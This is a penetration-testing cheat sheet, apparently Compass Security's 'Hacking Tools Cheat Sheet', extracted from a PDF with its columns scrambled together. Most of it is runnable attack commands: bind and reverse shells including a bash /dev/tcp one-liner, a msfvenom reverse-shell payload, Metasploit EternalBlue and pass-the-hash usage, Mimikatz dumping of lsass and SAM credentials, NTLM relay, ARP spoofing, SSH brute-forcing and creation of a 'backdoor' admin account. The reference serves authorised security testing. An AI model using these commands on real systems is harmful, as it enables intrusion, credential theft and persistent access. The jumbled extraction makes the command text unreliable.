Start TLS Server: Delete ARP cache: Scan for vulnerabilities (script category filter): Hacking Tools Cheat Sheet # ncat --ssl -l -p 1337 --ssl-cert # ip neigh flush all # nmap -n -Pn --script "vuln and safe" Compass Security, Version 1.1, January 2020 cert.pem --ssl-key key.pem Sniff traffic: 10.5.23.0/24 https://www.compass-security.com Connect to TLS service: # tcpdump [options] [filters] Performance Tuning (1 SYN packet ≈ 60 bytes # ncat --ssl 10.5.23.42 1337 Useful tcpdump options: → 20'000 packets/s ≈ 10 Mbps): Basic Linux Networking Tools Connect to TLS service using openssl: ▪ -i interface: Interface or any for all # nmap -n -Pn --min-rate 20000 10.5.23.0/24 Show IP configuration: # openssl s_client -connect ▪ -n: Disable name and port resolution # ip a l 10.5.23.42:1337 ▪ -A: Print in ASCII Useful nmap options: Change IP/MAC address: Show certificate details: ▪ -XX: Print in hex and ASCII ▪ -n: Disable name and port resolution # ip link set dev eth0 down # openssl s_client -connect ▪ -w file: Write output PCAP file ▪ -PR: ARP host discovery # macchanger -m 23:05:13:37:42:21 eth0 10.5.23.42:1337 | openssl x509 -text ▪ -r file: Read PCAP file ▪ -Pn: Disable host discovery # ip link set dev eth0 up Test TLS server certificate and ciphers: ▪ -sn: Disable port scan (host discovery only) Useful tcpdump filters: # sslyze --regular 10.5.23.42:443 ▪ -sS/-sT/-sU: SYN/TCP connect/UDP scan Static IP address configuration: ▪ not arp: No ARP packets # ip addr add 10.5.23.42/24 dev eth0 ▪ --top-ports 50: Scan 50 top ports TCP to TLS proxy: ▪ port ftp or port 23: Only port 21 or 23 ▪ -iL file: Host input file DNS lookup: # socat TCP-LISTEN:2305,fork,reuseaddr ▪ host 10.5.23.31: Only from/to host ssl:example.com:443 ▪ -oA file: Write output files (3 types) # dig compass-security.com ▪ net 10.5.23.0/24: Only from/to hosts in ▪ -sC: Script scan (default scripts) Reverse DNS lookup: Online TLS tests: network ▪ : Specific scripts # dig -x 10.5.23.42 ▪ ssllabs.com, hardenize.com --script <file/category> Advanced sniffing using tshark or Wireshark. ▪ -sV: Version detection Information Gathering HTTP Tools Sniffing over SSH on a remote host: ▪ -6: IPv6 scan # ssh 10.5.23.42 tcpdump -w- port not The target can be specified using CIDR notation Find owner/contact of domain or IP address: Start Python webserver on port 2305: ssh | wireshark -k -i - # whois compass-security.com # python3 -m http.server 2305 (10.5.23.0/24) or range definitions (10.13- Search in network traffic: 37.5.1-23). Get nameservers and test for DNS zone transfer: Perform HTTP Request: # ngrep -i password # dig example.com ns # curl http://10.5.23.42:2305/?foo=bar Fast scan using masscan: Show HTTP GET requests: # dig example.com axfr @n1.example.com Useful curl options: # masscan -p80,8000-8100 --rate 20000 # urlsnarf 10.0.0.0/8 Get hostnames from CT logs: Search for ▪ -k: Accept untrusted certificates Show transmitted images: %.compass-security.com on https://crt.sh. ▪ -d "foo=bar": HTTP POST data Public internet scan databases: # driftnet ▪ shodan.io, censys.io Or using an nmap script: ▪ -H: "Foo: Bar": HTTP header # nmap -sn -Pn compass-security.com ▪ -I: Perform HEAD request Network Scanning Shells --script hostmap-crtsh ▪ -L: Follow redirects ARP Scan: ▪ -o foobar.html: Write output file Start bind shell (on victim): Combine various sources for subdomain enum: # nmap -n -sn -PR 10.5.23.0/24 # amass enum -src -brute -min-for- ▪ --proxy http://127.0.0.1:8080: Set proxy # ncat -l -p 2305 -e "/bin/bash -i" Reverse DNS lookup of IP range: recursive 2 -d compass-security.com Scan for common files/applications/configs: Connect to bind shell (on attacker): # nmap -sL 10.5.23.0/24 # nikto -host https://example.net # ncat 10.5.23.42 2305 TCP Tools Nmap host discovery (ARP, ICMP, SYN 443/tcp, Enumerate common directory-/filenames: Listen for reverse shell (on attacker): ACK 80/tcp): Listen on TCP port: # gobuster dir -k -u # ncat -l -p 23 # nmap -sn -n 10.5.23.0/24 # ncat -l -p 1337 https://example.net -w Start reverse shell (on victim): Connect to TCP port: /usr/share/wordlists/dirb/common.txt TCP scan (SYN scan = half-open scan): # ncat -e "/bin/bash -i" 10.5.23.5 23 # nmap -Pn -n -sS -p # ncat 10.5.23.42 1337 Start reverse shell with bash only (on victim): Sniffing 22,25,80,443,8080 10.5.23.0/24 # bash -i &>/dev/tcp/10.5.23.5/42 0>&1 TLS Tools ARP spoofing: List Nmap scripts: Upgrade to pseudo terminal: # arpspoof -t 10.5.23.42 10.5.23.1 # ls /usr/share/nmap/scripts Create self-signed certificate: # python -c 'import pty; # openssl req -x509 -newkey rsa:2048 Or a graphical tool: Scan for EternalBlue vulnerable hosts: pty.spawn("/bin/bash")' -keyout key.pem -out cert.pem -nodes # ettercap -G # nmap -n -Pn -p 443 --script smb- -subj "/CN=example.org/" vuln-ms17-010 10.5.23.0/24 Show ARP cache: # ip neigh Vulnerability DBs and Exploits Upgrade to Meterpreter (or press ^Z (Ctrl-Z)): bypass ExecutionPolicy and execute Invoke- Meterpreter via pass-the-hash: background AllChecks. Use the abuse functions. msf > set payload Exploit search (local copy of the Exploit-DB): Background session 1? [y/N] y windows/meterpreter/reverse_tcp Add a new local admin: # searchsploit apache > sessions # list sessions msf > set LHOST 10.5.23.42 # attacker C:\> net user backdoor P@ssw0rd23 Show exploit file path and copy it into clipboard: > sessions -u 1 # Upgrade msf > set LPORT 443 C:\> net localgroup Administrators # searchsploit -p 40142 > sessions 2 # interact with session 2 msf > set RHOST 10.5.23.21 # victim backdoor /add meterpreter > sysinfo # use it msf > set SMBPass 01[...]03:01[...]03 Online vulnerability and exploit databases: Scan for network shares: Upload / download files: msf > exploit ▪ cvedetails.com, exploit-db.com, # smbmap.py --host-file smbhosts.txt - meterpreter > upload pwn.exe meterpreter > shell packetstormsecurity.com u Administrator -p PasswordOrHash meterpreter > download c:\keepass.kdb C:\WINDOWS\system32> Cracking Execute a file: Windows Credentials Gathering NTLM Relay meterpreter > execute -i -f /your/bin Try SSH passwords from a wordlist: Start Mimikatz and create log file: Vulnerable if message_signing: disabled: # ncrack -p 22 --user root -P Port forwarding to localhost: C:\>mimikatz.exe # nmap -n -Pn -p 445 --script smb- ./passwords.txt 10.5.23.0/24 meterpreter > portfwd add -l 2323 -p # privilege::debug security-mode 10.5.23.0/24 3389 -r 10.5.23.23 # log C:\tmp\mimikatz.log Determine hash type: Disable SMB and HTTP in Responder.conf and Background Meterpreter session: # hashid 869d[...]bd88 Read lsass.exe process dump: start Responder: meterpreter > background Show example hash types for hashcat: # sekurlsa::minidump lsass.dmp # ./Responder.py -I eth0 Pivoting through existing Meterpreter session: # hashcat --example-hashes Dump lsass.exe in taskmgr or procdump. NTLM Relay to target and extract SAM file: > use post/multi/manage/autoroute Crack hashes (e.g. 5600 for NetNTLMv2 type): # ./ntlmrelayx.py -smb2support -t > set session 2 # meterpreter session Show passwords/hashes of logged in users: smb://10.5.23.42 # hashcat -m 5600 -a 0 hash.txt > run # sekurlsa::logonpasswords /path/to/wordlists/* > route Backup SYSTEM & SAM hive: NTLM Relay using socks proxy: # ./ntlmrelayx.py -tf targets.txt Crack hashes using John the Ripper: SOCKS via Meterpreter (requires autoroute): C:\>reg save HKLM\SYSTEM system.hiv -smb2support -socks # john hashes.txt > use auxiliary/server/socks4a C:\>reg save HKLM\SAM sam.hiv > set SRVPORT 8080 Extract hashes using Mimikatz: Configure ProxyChains: Metasploit Framework > run # lsadump::sam /system:system.hiv # vi /etc/proxychains.conf [...] Start Metasploit: Configure ProxyChains: /sam:sam.hiv socks4 127.0.0.1 1080 # msfconsole # vi /etc/proxychains.conf Search exploit: [...] Pass-the-Hash Access files via SOCKS proxy: > search eternalblue socks4 127.0.0.1 1080 Shell via pass-the-hash (Impacket Tools): # proxychains smbclient -m smb3 '\\10.5.23.42\C$' -W pc05 -U Connect through SOCKS proxy: # ./psexec.py -hashes Use exploit: Administrator%invalidPwd msf > use exploit/windows/smb/ms17_… # proxychains ncat 172.23.5.42 1337 :011AD41795657A8ED80AB3FF6F078D03 domain/[email protected] Configure exploit: Active Directory Linux Privilege Escalation Over a subnet and extract SAM file: msf exploit(…) > show options Use SharpHound to gather information and im- msf exploit(…) > set TARGET 10.5.23.42 Enumerate local information (-t for more tests): # crackmapexec -u Administrator -H port into Bloodhound to analyze. # curl -o /tmp/linenum :011AD41795657A8ED80AB3FF6F078D03 Run exploit: 10.5.23.0/24 --sam Download PingCastle from pingcastle.com and msf exploit(…) > exploit https://raw.githubusercontent.com/rebo otuser/LinEnum/master/LinEnum.sh Browse shares via pass-the-hash: generate Report. Generate reverse shell (WAR): # bash /tmp/linenum -r /tmp/report # ./smbclient.py # msfvenom -p Other hardening checks can be done using lynis domain/[email protected] -hashes More Online References java/jsp_shell_reverse_tcp LHOST=<your :011AD41795657A8ED80AB3FF6F078D03 ▪ GitHub "swisskyrepo/PayloadsAllTheThings" ip address> LPORT=443 -f war > sh.war or LinPEAS. ▪ GitHub "danielmiessler/SecLists Use sudo/SUID/capabilities/etc. exploits from RDP via pass-the-hash: Reverse shell listener: # xfreerdp /u:user /d:domain /pth: ▪ GitHub "enaqx/awesome-pentest" gtfobins.github.io. > use exploit/multi/handler 011AD41795657A8ED80AB3FF6F078D03 > set payload /v:10.5.23.42 linux/x64/shell_reverse_tcp Windows Privilege Escalation > set LHOST 10.5.23.42 # attacker Copy PowerUp.ps1 from GitHub "Pow- > set LPORT 443 erShellMafia/PowerSploit" into PowerShell to > exploit .